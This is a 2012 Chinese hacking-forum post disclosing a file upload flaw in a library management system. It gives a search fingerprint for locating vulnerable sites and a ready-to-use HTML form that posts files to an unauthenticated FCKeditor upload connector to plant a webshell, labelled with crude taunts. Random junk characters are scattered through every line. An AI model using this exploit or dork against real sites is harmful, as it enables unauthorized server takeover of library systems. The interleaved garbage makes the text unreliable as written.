中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞3 C3 y' a' K8 @
作者:冰锋刺客; j7 ^5 O, A1 P' s. b
厂商:点击书(dianjishu.com)% b2 N+ J; |7 e/ W0 h" s: l1 i/ @: N
日期:2012-6-213 s+ t( x4 t5 d
0 ^" l2 ^1 G" Q+ }5 g' ?$ H
I 概述. V$ k2 e+ Z; ~/ n6 e& Q- F/ w
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
; p4 n) P, Z2 z4 {$ F II 简介
1 K5 R: q/ r* }& t& p( J- V   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
; K5 v; l- N! P! v* h" e  @ 补充一个漏洞; b. a9 i3 p# h1 H3 [/ ?% [# }
<form id="frmUpload" enctype="multipart/form-data"8 k- F8 j' a& g5 U
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
4 {0 y: N8 H% E! ` <input id="btnUpload" type="submit" value="操翻他">4 J+ a7 U/ e9 m! Z4 F$ ~
</form>
5 ?: L( g  ]6 _$ w# \ 你们懂的! i8 A- z. n3 Z& n: ~( f1 w) }0 G
那傻逼提供还需要改包.( {2 [+ x$ ~( V" J% `- F
自己看了下源代码发现fckeditor
# u  t0 `/ o' D. ] 直接秒杀4 h- a( R0 i9 e' R, _  c7 \




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2